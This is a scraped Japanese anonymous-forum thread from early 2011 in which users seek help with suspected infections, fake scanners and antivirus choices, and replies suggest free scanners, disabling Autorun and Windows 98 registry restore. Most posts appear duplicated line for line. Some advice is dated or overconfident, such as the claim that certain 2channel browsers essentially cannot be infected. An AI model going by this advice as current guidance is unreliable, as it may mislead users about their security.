【Emsisoft - Free Emergency Kit】 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *手動Update )
http://www.emsisoft.com/en/software/eek/ *インストール不要タイプ (使い方:http://i26.tinypic.com/deo8xe.jpg )
【Live OneCare PC セーフティ オンラインスキャン】 (*駆除も可能 *Flash必要 *月1・2回程度空き時間に試してみて下さい)
http://onecare.live.com/site/ja-jp/default.htm (*使い方:http://i53.tinypic.com/dgqw76.jpg )
【F-Secure - Easy Clean】 (*クイックチェック用クラウドスキャナ *インストール不要タイプ )
http://www.softpedia.com/get/Antivirus/F-Secure-Easy-Clean.shtml (使い方:http://i52.tinypic.com/eknq4y.jpg )
【F-Secure オンラインスキャナ】 (*駆除も可能 *一時的にでも、Java の最新バージョン必要)
http://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/
【McAfee - Stinger】 (*インストール不要 *全ファイルスキャン *駆除可能 *月に数回配布 )
http://www.softpedia.com/get/Antivirus/McAfee-AVERT-Stinger.shtml (使い方:http://i54.tinypic.com/2q1uj2f.jpg )
【Malwarebytes' Anti-Malware】 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動Update)
http://www.malwarebytes.org/mbam.php (使い方:http://i56.tinypic.com/2ba076.jpg )
【Spyware Blaster】 http://www.javacoolsoftware.com/index.html (http://i45.tinypic.com/2ce6gkw.jpg *Flash Killer機能も実用的です)
607 :名無しさん@お腹いっぱい。:2011/01/01(土) 03:12:02
中古PC買ったんですがリカバリーしても残ってるウィルスってありますか?
リカバリーディスクにウィルスが入ってるってことはないですよね?
リカバリーディスクにウィルスが入ってるってことはないですよね?
608 :名無しさん@お腹いっぱい。:2011/01/03(月) 14:49:46
購入したノーパソに付いてたノートンの期限が切れるので対策ソフトの購入を考えてるのですが
ZEROってどうでしょうか?
ttp://sec.sourcenext.info/?i=com_top
価格は抜きにして性能についてお聞きしたいです。フリーのものはファイアウォールが
ないのが心配なので却下です。
こちらで質問してよろしかったでしょうか?適切なスレがあれば誘導お願いいたします。
ZEROってどうでしょうか?
ttp://sec.sourcenext.info/?i=com_top
価格は抜きにして性能についてお聞きしたいです。フリーのものはファイアウォールが
ないのが心配なので却下です。
こちらで質問してよろしかったでしょうか?適切なスレがあれば誘導お願いいたします。
609 :名無しさん@お腹いっぱい。:2011/01/03(月) 15:04:51
>>608
更新料無料を売りにしてシェアを伸ばしているけど、安かろう悪かろう、安いものにはわけがあるの典型だよ
ウイスル検出がZEROとかフリーの入れたほうがましとかジョークソフトとかひどい言われよう、最近は誤検出でOS壊したりもしたし
はっきりいってアンチウイルスソフトとしては厳しいからスルーしたほうがいい
更新料無料を売りにしてシェアを伸ばしているけど、安かろう悪かろう、安いものにはわけがあるの典型だよ
ウイスル検出がZEROとかフリーの入れたほうがましとかジョークソフトとかひどい言われよう、最近は誤検出でOS壊したりもしたし
はっきりいってアンチウイルスソフトとしては厳しいからスルーしたほうがいい
610 :名無しさん@お腹いっぱい。:2011/01/03(月) 22:39:29
すいません。
このウィルス(スパイウェア)って何ですか?
大阪、漫画喫茶ポパイ 京橋店のほとんどのパソコンがこれに感染しているんですが・・・。
Trackware:W32/Tracking_Cookie
ググっても、どんな影響があるのか、よくわかりません。
とりあえず、特定のサイトに訪問したとき、WEBブラウザによって作成されるスパイウェアとだけわかりました。
スレ違いならすいません。
どこのスレに書き込めば良いかわからなかったので、とりあえずこちらに投稿しました。
このウィルス(スパイウェア)って何ですか?
大阪、漫画喫茶ポパイ 京橋店のほとんどのパソコンがこれに感染しているんですが・・・。
Trackware:W32/Tracking_Cookie
ググっても、どんな影響があるのか、よくわかりません。
とりあえず、特定のサイトに訪問したとき、WEBブラウザによって作成されるスパイウェアとだけわかりました。
スレ違いならすいません。
どこのスレに書き込めば良いかわからなかったので、とりあえずこちらに投稿しました。
611 :名無しさん@お腹いっぱい。:2011/01/03(月) 23:27:30
Tracking_Cookieて出てるしトラッキングクッキーなんじゃないか
その人がどういったページに行ったかとかを監視してそれに合わせた広告とかを出すのに使われる
詳しくはトラッキングクッキーでぐぐってみそし
その人がどういったページに行ったかとかを監視してそれに合わせた広告とかを出すのに使われる
詳しくはトラッキングクッキーでぐぐってみそし
612 :名無しさん@お腹いっぱい。:2011/01/04(火) 05:30:32
エロサイトの架空請求50000円のポップアップウィンドーが
5分に1度くらいの頻度で画面に表示されます。
インターネットの線をはずしても、画面上のポップアップブロッカーを有効にしても
出てきます。どうしたらkのしつこいポップアップウィンドーが
出ないように設定できますか? よろしくお願いします!
5分に1度くらいの頻度で画面に表示されます。
インターネットの線をはずしても、画面上のポップアップブロッカーを有効にしても
出てきます。どうしたらkのしつこいポップアップウィンドーが
出ないように設定できますか? よろしくお願いします!
613 :名無しさん@お腹いっぱい。:2011/01/04(火) 11:11:53
>>611
つまり、それって店側が故意に設定してるスパイウェアってこと?
つまり、それって店側が故意に設定してるスパイウェアってこと?
615 :名無しさん@お腹いっぱい。:2011/01/04(火) 14:22:18
616 :名無しさん@お腹いっぱい。:2011/01/04(火) 14:52:29
>>613
いちおう合法的な商売行為であることが認められている
基本実害は無いと思って良いけど、足跡追跡して情報収集してるのがセキュリティーソフトにひっかかる
足跡追跡を気持ち悪いと嫌がる人もいるけど、気にしすぎるとネットなんてできない
いちおう合法的な商売行為であることが認められている
基本実害は無いと思って良いけど、足跡追跡して情報収集してるのがセキュリティーソフトにひっかかる
足跡追跡を気持ち悪いと嫌がる人もいるけど、気にしすぎるとネットなんてできない
617 :名無しさん@お腹いっぱい。:2011/01/05(水) 21:20:50
合法的なスパイウェアっすね!
なるほど!
あざっす。
なるほど!
あざっす。
618 :名無しさん@お腹いっぱい。:2011/01/08(土) 23:08:53
アイコンのところにSystem Toolって出てきて WARNINGの文字が消えません。
TOP画面に赤い文字でWARNINNG〜って出ています。ウィルスに感染したと思うんですが
対処の方法を教えて頂けませんでしょうか?初心者なんで全くわかりません・・・
TOP画面に赤い文字でWARNINNG〜って出ています。ウィルスに感染したと思うんですが
対処の方法を教えて頂けませんでしょうか?初心者なんで全くわかりません・・・
619 :名無しさん@お腹いっぱい。:2011/01/08(土) 23:26:17
>>618
初心者なら大人しくリカバリしておけ
初心者なら大人しくリカバリしておけ
620 :名無しさん@お腹いっぱい。:2011/01/08(土) 23:28:46
>>619
リカバリ以外に方法は無いですか?
リカバリ以外に方法は無いですか?
621 :名無しさん@お腹いっぱい。:2011/01/08(土) 23:37:29
622 :名無しさん@お腹いっぱい。:2011/01/09(日) 00:24:29
友人からの修理依頼
先日から頭痛の種、フォーマット直後から虫が常駐してしまいます。
【使用MACHINE】TOSHIBA TX65
【使用OS】「xp」何度やっても同じ
【Microsoft Update(MU)の状態】 「osを入れたばかり」
【使用セキュリティソフトとバージョン】 「nortonかAVASTでやったが結果は同じ」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無線、ケーブル、E-MOBILE」 で試したが同じ結果
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「WIN32mALWARE-gen,w32 IRCBOT GEN,SERIVCES.EXE」 ゴミ箱とsystem Information
【どんな症状が出るか】 「OSを入れた直後に虫退治を入れると即反応」
【症状が出る前に何をやったか】 「フォーマットしてOSを入れた」
【症状を解決しようとどのような処置を取ったか】 「何度やっても虫がいます」
【その他の質問】 「友人からの修理依頼のPCなのでBIOSに虫がいるかも」
先日から頭痛の種、フォーマット直後から虫が常駐してしまいます。
【使用MACHINE】TOSHIBA TX65
【使用OS】「xp」何度やっても同じ
【Microsoft Update(MU)の状態】 「osを入れたばかり」
【使用セキュリティソフトとバージョン】 「nortonかAVASTでやったが結果は同じ」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無線、ケーブル、E-MOBILE」 で試したが同じ結果
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「WIN32mALWARE-gen,w32 IRCBOT GEN,SERIVCES.EXE」 ゴミ箱とsystem Information
【どんな症状が出るか】 「OSを入れた直後に虫退治を入れると即反応」
【症状が出る前に何をやったか】 「フォーマットしてOSを入れた」
【症状を解決しようとどのような処置を取ったか】 「何度やっても虫がいます」
【その他の質問】 「友人からの修理依頼のPCなのでBIOSに虫がいるかも」
623 :名無しさん@お腹いっぱい。:2011/01/09(日) 02:09:07
624 :名無しさん@お腹いっぱい。:2011/01/09(日) 03:37:53
biosのウイルスはbios改ざんでpcを起動させなくなる系だからそういうウイルスはいないかな・・・
考えられるのは誤検出、インスコCDが中国産他、インスコ後オンライン状態になっててセクルチーソフト入れる前にあれこれとか
考えられるのは誤検出、インスコCDが中国産他、インスコ後オンライン状態になっててセクルチーソフト入れる前にあれこれとか
625 :名無しさん@お腹いっぱい。:2011/01/09(日) 04:23:21
ここのサイトでオンラインスキャンした時だけ、
http://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/
このウィルスに感染してるファイルが検出されるんだが・・・・
W32/Malware!Gemini
これ、なんのウィルス?
検知されたファイルを他のアンチウィルスソフトやスキャンサイトでスキャンしても、全く異常なし。
もしかして、これ誤検知?
http://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/
このウィルスに感染してるファイルが検出されるんだが・・・・
W32/Malware!Gemini
これ、なんのウィルス?
検知されたファイルを他のアンチウィルスソフトやスキャンサイトでスキャンしても、全く異常なし。
もしかして、これ誤検知?
626 :名無しさん@お腹いっぱい。:2011/01/09(日) 05:26:43
627 :名無しさん@お腹いっぱい。:2011/01/09(日) 06:07:09
>>626
トータルでやってみたら、全く問題なかった・・・。
トータルでやってみたら、全く問題なかった・・・。
628 :名無しさん@お腹いっぱい。:2011/01/09(日) 08:34:55
おはようございます。>622です。
>623
OSは正規品です。
念のため、予備のコピーもファイルのサイズも確認しました。
NORTONも正規品。
両方とも古いから、この二枚は結構永く使っています。
当たり前ですが、今まで虫が出たことは有りません。
Avastはネットから落とします。
一晩置いて、今は普通に動いていますが、
通例、この後電源が突然落ちたり、
虫の特性らしく、microsoftに繋がらなくなり、Updateが出来なくなり、
最終的には起動時にループし出して、起きなくなります。
>623
OSは正規品です。
念のため、予備のコピーもファイルのサイズも確認しました。
NORTONも正規品。
両方とも古いから、この二枚は結構永く使っています。
当たり前ですが、今まで虫が出たことは有りません。
Avastはネットから落とします。
一晩置いて、今は普通に動いていますが、
通例、この後電源が突然落ちたり、
虫の特性らしく、microsoftに繋がらなくなり、Updateが出来なくなり、
最終的には起動時にループし出して、起きなくなります。
629 :八頭 ◆YAGApwSaEw :2011/01/09(日) 11:14:58
>>622
IPA - 「USB メモリのセキュリティ対策を意識していますか?」
★USBメモリを使っていなくても必ずオートラン無効を実施しておきましょう → PC再起動
http://www.ipa.go.jp/security/txt/2009/05outline.html
↓インストーラをダウンロードして実行
Malicious 悪意のあるソフトウェアの削除ツール - softpedia.com
http://www.softpedia.com/get/Antivirus/Microsoft-Malicious-Software-Removal-Tool.shtml
↓インストーラをダウンロードして順番に実行
【Emsisoft - MalAware】 (*クイックなチェック用途クラウドスキャナ *Emergency Kitとの併用がベストです)
*インストール不要タイプ *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
http://www.emsisoft.com/en/software/malaware/ ( 使い方:http://i47.tinypic.com/hv9r1d.jpg )
【Emsisoft - Free Emergency Kit】 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *手動Update )
http://www.emsisoft.com/en/software/eek/ *インストール不要タイプ (使い方:http://i26.tinypic.com/deo8xe.jpg )
↓このインストーラをダウンロードした後、ネットケーブルを抜いてNortonをアンインストールして入れ替えインストール
Avira Premium Security Suite 30 日間無料試用版
http://www.avira.jp/jp/products/test_license_2.html
インストール過程で、ネット接続要請のダイアログが出てからネット接続すること。初回Updateの後にフルスキャン実施
IPA - 「USB メモリのセキュリティ対策を意識していますか?」
★USBメモリを使っていなくても必ずオートラン無効を実施しておきましょう → PC再起動
http://www.ipa.go.jp/security/txt/2009/05outline.html
↓インストーラをダウンロードして実行
Malicious 悪意のあるソフトウェアの削除ツール - softpedia.com
http://www.softpedia.com/get/Antivirus/Microsoft-Malicious-Software-Removal-Tool.shtml
↓インストーラをダウンロードして順番に実行
【Emsisoft - MalAware】 (*クイックなチェック用途クラウドスキャナ *Emergency Kitとの併用がベストです)
*インストール不要タイプ *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
http://www.emsisoft.com/en/software/malaware/ ( 使い方:http://i47.tinypic.com/hv9r1d.jpg )
【Emsisoft - Free Emergency Kit】 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *手動Update )
http://www.emsisoft.com/en/software/eek/ *インストール不要タイプ (使い方:http://i26.tinypic.com/deo8xe.jpg )
↓このインストーラをダウンロードした後、ネットケーブルを抜いてNortonをアンインストールして入れ替えインストール
Avira Premium Security Suite 30 日間無料試用版
http://www.avira.jp/jp/products/test_license_2.html
インストール過程で、ネット接続要請のダイアログが出てからネット接続すること。初回Updateの後にフルスキャン実施
630 :名無しさん@お腹いっぱい。:2011/01/09(日) 13:08:38
ずぶの初心者です。
先日の2ちゃん騒動のときに、専ブラJaneXenoでニュー速のスレ一覧の更新をしたら
鯖が落ちていたらしく、更新できませんでした。そのため運用情報版に行ったところ
ウイルス云々と言われていました。で、速攻ノートンでウイルスチェックしたのですが
何も出てきませんでした。その後も毎日フルスキャンかけてますが、脅威は出てきません。
ここで質問なのですが、「Doe系専ブラならウイルスに感染しない」という話は本当でしょうか?
先日の2ちゃん騒動のときに、専ブラJaneXenoでニュー速のスレ一覧の更新をしたら
鯖が落ちていたらしく、更新できませんでした。そのため運用情報版に行ったところ
ウイルス云々と言われていました。で、速攻ノートンでウイルスチェックしたのですが
何も出てきませんでした。その後も毎日フルスキャンかけてますが、脅威は出てきません。
ここで質問なのですが、「Doe系専ブラならウイルスに感染しない」という話は本当でしょうか?
631 :630:2011/01/09(日) 13:17:56
ああテンパッててテンプレ忘れてました
【使用OS】 「Vista Home Premum」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2011」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「Norton Internet Security 2011」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
よろしくおねがいします
【使用OS】 「Vista Home Premum」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2011」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「Norton Internet Security 2011」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
よろしくおねがいします
632 :名無しさん@お腹いっぱい。:2011/01/09(日) 15:18:04
>「Doe系専ブラならウイルスに感染しない」という話は本当でしょうか?
100%ではないが感染しません
100%ではないが感染しません
633 :630:2011/01/09(日) 15:44:25
>>632
ありがとうございます。
いわゆる暴露ウイルスというやつが、WEBサイトからも
感染すると小耳に挟んでいたのでガクブルしていたところです。
ファイル共有ソフトは一切使っていません。
その後f-secureでもオンラインフルスキャンしましたが異常はありませんでした。
とりあえずは大丈夫と考えてよいでしょうか?
ありがとうございます。
いわゆる暴露ウイルスというやつが、WEBサイトからも
感染すると小耳に挟んでいたのでガクブルしていたところです。
ファイル共有ソフトは一切使っていません。
その後f-secureでもオンラインフルスキャンしましたが異常はありませんでした。
とりあえずは大丈夫と考えてよいでしょうか?
634 :名無しさん@お腹いっぱい。:2011/01/09(日) 15:45:27
>>628
ネットに繋いだ瞬間にセキュリティホール突かれてるんじゃね?
正常に動いてるPCがあるなら更新適応済みのCDを作ってやってみればいいと思う。
A.K Office > ソフトウェア > SP+メーカー
http://www.ak-office.jp/software/winsppm.html
ネットに繋いだ瞬間にセキュリティホール突かれてるんじゃね?
正常に動いてるPCがあるなら更新適応済みのCDを作ってやってみればいいと思う。
A.K Office > ソフトウェア > SP+メーカー
http://www.ak-office.jp/software/winsppm.html
635 :名無しさん@お腹いっぱい。:2011/01/09(日) 16:25:36
>>633
問題ない
問題ない
>>635
ありがとうございます!
ありがとうございます!
637 :名無しさん@お腹いっぱい。:2011/01/09(日) 17:06:30
5,6年前に爆発的に広がったウィルスの症状みたいだなぁ。
知り合いのノートPC が感染して出張駆除してきた。
知り合いのノートPC が感染して出張駆除してきた。
638 :622:2011/01/09(日) 22:01:40
639 :八頭 ◆YAGApwSaEw :2011/01/10(月) 21:20:35
>>622
その後どう?
その後どう?
640 :622:2011/01/10(月) 21:46:51
>>639
おお、Good timing.
今日は忙しかったので、今始めたところです。
XPを入れただけです。
先ず、autorunを無効にするために<方法D>をやろうとしたら、
2. レジストリエディタ画面で次のフォルダを見つけ、クリックします。
[HKEY_LOCAL_MACHINE](※)→[SOFTWARE]→[Microsoft]→[Windows]→
[CurrentVersion]→[policies]→[Explorer]
の→[Explorer]が有りません。
他のPCだとちゃんとあるのですが?
何かヘマやらかしてますかね?
おお、Good timing.
今日は忙しかったので、今始めたところです。
XPを入れただけです。
先ず、autorunを無効にするために<方法D>をやろうとしたら、
2. レジストリエディタ画面で次のフォルダを見つけ、クリックします。
[HKEY_LOCAL_MACHINE](※)→[SOFTWARE]→[Microsoft]→[Windows]→
[CurrentVersion]→[policies]→[Explorer]
の→[Explorer]が有りません。
他のPCだとちゃんとあるのですが?
何かヘマやらかしてますかね?
641 :八頭 ◆YAGApwSaEw :2011/01/10(月) 22:06:38
Vistaならコレだな
Windowsの自動実行機能(Autorun)を完全に無効化してウイルス感染を防ぐ − @IT
http://www.atmarkit.co.jp/fwin2k/win2ktips/1139autrun/autrun.html
■Autorun修正パッチを適用する
Windows Vista/Windows Server 2008の場合、Autorunに関する修正はMS08-038のセキュリティ・パッチに含まれるので、
このパッチを適用すればよい(以下、いずれもリンク先はマイクロソフトのダウンロード・センター)。
Windows Vista 用の更新プログラム (KB950582)
Windowsの自動実行機能(Autorun)を完全に無効化してウイルス感染を防ぐ − @IT
http://www.atmarkit.co.jp/fwin2k/win2ktips/1139autrun/autrun.html
■Autorun修正パッチを適用する
Windows Vista/Windows Server 2008の場合、Autorunに関する修正はMS08-038のセキュリティ・パッチに含まれるので、
このパッチを適用すればよい(以下、いずれもリンク先はマイクロソフトのダウンロード・センター)。
Windows Vista 用の更新プログラム (KB950582)
642 :622:2011/01/10(月) 22:14:00
すんません、今はVISTAは使っていないです。
それと、NETにはまだ繋いでいません。
もうどこで進入してくるのかに集中しています。
他のマシンで拾ってきてもUSBで入れては無意味な気がします。
それと、NETにはまだ繋いでいません。
もうどこで進入してくるのかに集中しています。
他のマシンで拾ってきてもUSBで入れては無意味な気がします。
643 :名無しさん@お腹いっぱい。:2011/01/10(月) 23:43:54
>>642
ちょいと調べてみたけど、先にWUする必要があるんじゃね?
http://support.microsoft.com/kb/967715/ja
自動実行機能を無効にするための前提条件
自動実行機能を無効にするには、以下の更新プログラムをインストールする必要があります
ちょいと調べてみたけど、先にWUする必要があるんじゃね?
http://support.microsoft.com/kb/967715/ja
自動実行機能を無効にするための前提条件
自動実行機能を無効にするには、以下の更新プログラムをインストールする必要があります
644 :名無しさん@お腹いっぱい。:2011/01/11(火) 22:26:58
622です。
>>643
今、Updateしようとしたらもう繋がらずに電源が落ちました。
電源が落ちるのは別の可能性を疑い始めました?
M/Bに損傷が有るなら私の手には負えません。
これから>>634でも作ってみてTRYしてみます。
ダメなら明日は早いので寝ます。
明日から二週間ほど出張なので当分こいつは触れません。
みなさん、ご親切なadvicesをどうもありがとう御座いました。
また報告させていただきます。
>>643
今、Updateしようとしたらもう繋がらずに電源が落ちました。
電源が落ちるのは別の可能性を疑い始めました?
M/Bに損傷が有るなら私の手には負えません。
これから>>634でも作ってみてTRYしてみます。
ダメなら明日は早いので寝ます。
明日から二週間ほど出張なので当分こいつは触れません。
みなさん、ご親切なadvicesをどうもありがとう御座いました。
また報告させていただきます。
645 :名無しさん@お腹いっぱい。:2011/01/14(金) 02:31:17
DWTRIG20というexeがタクスマネージャにあったんですが
これはなんでしょう?3Dの同人エロゲをインストした後でしたが
これはなんでしょう?3Dの同人エロゲをインストした後でしたが
646 :名無しさん@お腹いっぱい。:2011/01/16(日) 15:29:34
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1453845579
trident_sound_day1さんの回答
>seriall.comもfullddl.comも俺が潰したサイトの一つ。Keygenだのクラックだのといった違法ファイルを多数配布していた。
ウイルスサイトって個人で潰すことできるの?www
trident_sound_day1さんの回答
>seriall.comもfullddl.comも俺が潰したサイトの一つ。Keygenだのクラックだのといった違法ファイルを多数配布していた。
ウイルスサイトって個人で潰すことできるの?www
647 :名無しさん@お腹いっぱい。:2011/01/16(日) 17:15:33
なんか最近別スレでもやたら知恵遅れのリンク貼る人いるけど、ここは知恵遅れヲチする場所じゃないんだよ
648 :名無しさん@お腹いっぱい。:2011/01/16(日) 17:50:10
なんかサイトめぐりしてたらHTTP Fake Scan Webpage 2っていうのにひっかりました・・・
調べても全然概要とかでてきません・・・
これってどんなウィルスなんでしょうか?
調べても全然概要とかでてきません・・・
これってどんなウィルスなんでしょうか?
649 :名無しさん@お腹いっぱい。:2011/01/16(日) 18:15:54
650 :名無しさん@お腹いっぱい。:2011/01/16(日) 18:19:56
>>649
ん?ってことは言葉の通りフェイクで気にすることないの?
ん?ってことは言葉の通りフェイクで気にすることないの?
651 :名無しさん@お腹いっぱい。:2011/01/16(日) 18:21:30
調べたんだがどんな被害あるのかがまったくわからない・・・
情弱ですみません
情弱ですみません
652 :名無しさん@お腹いっぱい。:2011/01/16(日) 18:49:46
そのまんまだよ
しつこく金払えと催促してくる、pcに悪さするのもある
しつこく金払えと催促してくる、pcに悪さするのもある
653 :名無しさん@お腹いっぱい。:2011/01/16(日) 18:56:27
654 :名無しさん@お腹いっぱい。:2011/01/23(日) 16:58:33
このスレとはベクトルが多少違う気がするのですが、わかる方教えてください。
スペックとしては、XPで基本的な対策は全てしており(最新フルスキャンは昨日)、
天気予報系のみJSを許可した火狐最新版を使っています。
さっき気づいたのですが、tenki.jp(気象協会)のサイトの画像系が、akamai.net
から吐かれています。
これで検索したら、アメリカのコンテンツ配信会社らしく、噛んでいても別におかしくは
ないのかもしれませんが。
ただ、ググル先生は、過去に不正ソフト配信元になってたようなことを言っています。
ttp://www.google.com/safebrowsing/diagnostic?site=akamai.net/&hl=ja
また、tenki.jpとakamai.netを並列検索すると、いくつかマカフィーサイトアドバイザーが
危険と警告するサイトが出てます。
単に、2階層以下にtenki.jpと入れた偽装アドレスのようにも見えるのですが。
これは、単に気象協会がakamai.netを利用しているだけで、書き換えが行われている
という意味ではないのでしょうか?
それともGumblerのように、何らかの不正があるのでしょうか?
念のためJS許可を外して、現在再度フルスキャン中です。
スペックとしては、XPで基本的な対策は全てしており(最新フルスキャンは昨日)、
天気予報系のみJSを許可した火狐最新版を使っています。
さっき気づいたのですが、tenki.jp(気象協会)のサイトの画像系が、akamai.net
から吐かれています。
これで検索したら、アメリカのコンテンツ配信会社らしく、噛んでいても別におかしくは
ないのかもしれませんが。
ただ、ググル先生は、過去に不正ソフト配信元になってたようなことを言っています。
ttp://www.google.com/safebrowsing/diagnostic?site=akamai.net/&hl=ja
また、tenki.jpとakamai.netを並列検索すると、いくつかマカフィーサイトアドバイザーが
危険と警告するサイトが出てます。
単に、2階層以下にtenki.jpと入れた偽装アドレスのようにも見えるのですが。
これは、単に気象協会がakamai.netを利用しているだけで、書き換えが行われている
という意味ではないのでしょうか?
それともGumblerのように、何らかの不正があるのでしょうか?
念のためJS許可を外して、現在再度フルスキャン中です。
655 :654:2011/01/23(日) 17:52:03
念のため追加情報です。
マカフィーによるフルスキャンでは、何も出ませんでした。
特に問題なければJSを許可したいのですが、大丈夫なのでしょうか。
マカフィーによるフルスキャンでは、何も出ませんでした。
特に問題なければJSを許可したいのですが、大丈夫なのでしょうか。
656 :名無しさん@お腹いっぱい。:2011/01/23(日) 22:54:11
起動ができません
一応windows98の画面まではいくのですが・・・
初期化をしようとしても準備ができてませんってひょうじされます
感染ウイルスはわからないです
買い換えろってことなんですかね。初期化できない手ごわいウイルスは初めてでつらいです><
一応windows98の画面まではいくのですが・・・
初期化をしようとしても準備ができてませんってひょうじされます
感染ウイルスはわからないです
買い換えろってことなんですかね。初期化できない手ごわいウイルスは初めてでつらいです><
657 :名無しさん@お腹いっぱい。:2011/01/23(日) 22:57:20
起動ができません
一応windows98の画面まではいくのですが・・・
初期化をしようとしても準備ができてませんってひょうじされます
感染ウイルスはわからないです
買い換えろってことなんですかね。初期化できない手ごわいウイルスは初めてでつらいです><
一応windows98の画面まではいくのですが・・・
初期化をしようとしても準備ができてませんってひょうじされます
感染ウイルスはわからないです
買い換えろってことなんですかね。初期化できない手ごわいウイルスは初めてでつらいです><
658 :名無しさん@お腹いっぱい。:2011/01/23(日) 23:01:07
Trojan:Win32/Malatが、出現した場合の対処法について教えて下さい。
くぐれば、セキュリティエッセンシャルに問い合わせと書いていますが、それ以外に
対処法は無いでしょうか?
くぐれば、セキュリティエッセンシャルに問い合わせと書いていますが、それ以外に
対処法は無いでしょうか?
659 : ◆N9P3SuvBPo :2011/01/24(月) 00:26:58
>656
俺もWindows98使ってるけど、この方法でも駄目?
起動
↓
F8キー連打
↓
Start Up Menu が表示されたら5のCommand Prompt Olryを選ぶ
↓
c:>という表示が出たら
scanreg /restoreと入力してEnterキーを押す
↓
正常に起動できてる日付を選ぶ
↓
再起動(exitと入力してEnterを押すorCtrl+Alt+Deleteキーを押す)
駄目なら買い替えですね。
何故ならWindows98はMicrosoftUpdateができない、対応してるセキュリティソフトもほとんど無い、
などセキュリティ的にリスクを伴います。
それに、買い換えたら今より快適になりますよ。
俺もWindows98使ってるけど、この方法でも駄目?
起動
↓
F8キー連打
↓
Start Up Menu が表示されたら5のCommand Prompt Olryを選ぶ
↓
c:>という表示が出たら
scanreg /restoreと入力してEnterキーを押す
↓
正常に起動できてる日付を選ぶ
↓
再起動(exitと入力してEnterを押すorCtrl+Alt+Deleteキーを押す)
駄目なら買い替えですね。
何故ならWindows98はMicrosoftUpdateができない、対応してるセキュリティソフトもほとんど無い、
などセキュリティ的にリスクを伴います。
それに、買い換えたら今より快適になりますよ。
660 :名無しさん@お腹いっぱい。:2011/01/24(月) 00:58:34
>>659
(´∀`)ノ
横レスすまそ。
scanreg /restoreすると一番古いファイルとrestoreしたときに作られるファイルが
置き換えられるからrestoreするまえにファイルコピーしておいたほうがよくないかな。と言ってみる
(´∀`)ノ
横レスすまそ。
scanreg /restoreすると一番古いファイルとrestoreしたときに作られるファイルが
置き換えられるからrestoreするまえにファイルコピーしておいたほうがよくないかな。と言ってみる
セーフモードで起動できたらの話ね
>>659さん、>>660さん、原因がわかりましたw
ウイルスソフトでした(汗
セーフモードで起動してアドミでログインしてウイルスソフトをアンインストールしたら
きちんと起動してくれました><
F8の存在を知れて勉強になりました。あざした><
ウイルスソフトでした(汗
セーフモードで起動してアドミでログインしてウイルスソフトをアンインストールしたら
きちんと起動してくれました><
F8の存在を知れて勉強になりました。あざした><
663 :名無しさん@お腹いっぱい。:2011/02/04(金) 01:14:57
【使用OS】 Win XP
【使用セキュリティソフトとバージョン】 Avira のフリー
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
XP/PDF.Jeka.B をWebサーフィン中に検出し一応ブロックしました
javaが起動してエラー動作して終了しました エラー内容を記録し損ねました
ウィルス名 Jeka.B のみでググっても有益な情報が無いのでもしわかる方がいらっしゃいましたらお願いします。
【使用セキュリティソフトとバージョン】 Avira のフリー
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
XP/PDF.Jeka.B をWebサーフィン中に検出し一応ブロックしました
javaが起動してエラー動作して終了しました エラー内容を記録し損ねました
ウィルス名 Jeka.B のみでググっても有益な情報が無いのでもしわかる方がいらっしゃいましたらお願いします。
664 :名無しさん@お腹いっぱい。:2011/02/04(金) 02:35:16
>>663
XP/PDF.Jeka.BではなくEXP/PDF.Jeka.Bじゃね?
Jeka.Bでぐぐったらウイルストータルがみつかる。
ttp://www.virustotal.com/file-scan/report.html?id=3fddafc4636c5e4216cf1bd6c65ca1882c29958e6174b2a580242ff12a576ad7-1295727206
ウイルストータルからTrojan.Pidiefでぐぐるとこれがみつかる。
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2009-121708-1022-99
EXP/PDF.Jeka.Bの名前の一部PDFと「Trojan.Pidief」の説明内容で問題ないと推測。
Adobe ReaderやAdobe Acrobatのアップデートをしていれば問題ないと思われる。
(フリー使っているヒトなら特に)これからはこの程度は調べようよ。
XP/PDF.Jeka.BではなくEXP/PDF.Jeka.Bじゃね?
Jeka.Bでぐぐったらウイルストータルがみつかる。
ttp://www.virustotal.com/file-scan/report.html?id=3fddafc4636c5e4216cf1bd6c65ca1882c29958e6174b2a580242ff12a576ad7-1295727206
ウイルストータルからTrojan.Pidiefでぐぐるとこれがみつかる。
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2009-121708-1022-99
EXP/PDF.Jeka.Bの名前の一部PDFと「Trojan.Pidief」の説明内容で問題ないと推測。
Adobe ReaderやAdobe Acrobatのアップデートをしていれば問題ないと思われる。
(フリー使っているヒトなら特に)これからはこの程度は調べようよ。
665 :名無しさん@お腹いっぱい。:2011/02/05(土) 23:57:43
姉に頼まれてPCが動きづらくなった原因を探していました(私は多少いじれる程度)
sweetIMというツールがいつの間にかインストールされていたようなのですが、
